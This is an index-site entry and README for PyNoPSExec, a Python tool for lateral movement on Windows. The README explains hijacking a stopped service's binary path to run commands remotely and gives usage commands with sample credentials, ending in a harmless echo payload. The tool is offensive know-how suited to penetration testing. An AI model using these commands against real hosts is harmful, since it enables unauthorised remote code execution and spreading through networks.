Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/b0bac/PyNoPSExec
修改自SharpNoPSExec的基于python的横移工具 A Lateral Movement Tool Learned From SharpNoPSExec -- Twitter: @juliourena
https://github.com/b0bac/PyNoPSExec
Last synced: about 1 month ago
JSON representation
修改自SharpNoPSExec的基于python的横移工具 A Lateral Movement Tool Learned From SharpNoPSExec -- Twitter: @juliourena
- Host: GitHub
- URL: https://github.com/b0bac/PyNoPSExec
- Owner: b0bac
- Created: 2021-05-08T05:10:20.000Z (over 3 years ago)
- Default Branch: main
- Last Pushed: 2021-05-08T08:50:11.000Z (over 3 years ago)
- Last Synced: 2024-06-06T23:39:59.101Z (3 months ago)
- Language: Python
- Homepage:
- Size: 5.34 MB
- Stars: 32
- Watchers: 1
- Forks: 8
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
- awesome-hacking-lists - b0bac/PyNoPSExec - 修改自SharpNoPSExec的基于python的横移工具 A Lateral Movement Tool Learned From SharpNoPSExec -- Twitter: @juliourena (Python)
README
# PyNoPSExec
**A Lateral Movement Tool Learned From SharpNoPSExec -- Twitter: @juliourena 根据@juliourena大神的SharpNOPsExec项目改写的横向移动工具**
+ Platform(平台): Windows 10
+ Language(语言): Python2
## 原理简介
**通过修改服务启动的二进制文件路径,然后启动服务来执行,对服务的要求是:**
+ 没有运行的手动启动或禁止启动的服务
+ 服务没有依赖项
+ 该脚本没有提供服务二进制文件路径恢复功能,需要先记好对应路径,然后可以再次运行该脚本进行恢复,避免服务出问题
+ 关于查询服务可以使用impacket examples中的services.py 或者对应的exe程序
```bash
.\services.exe sec/testuser:TestPassword@[email protected] config -name AppMgmt
```
## 使用方法
```bash
net use \\192.168.23.107\admin$ "TestPassword@123" /user:testuser
python PyNoPSexec.py -t 192.168.23.107 -u testuser -p "TestPassword@123" -d test.sec.com -s AppMgmt -e "c:\\windows\\system32\\cmd.exe /c echo hackedbybobac > c:\\bobac.txt"
```
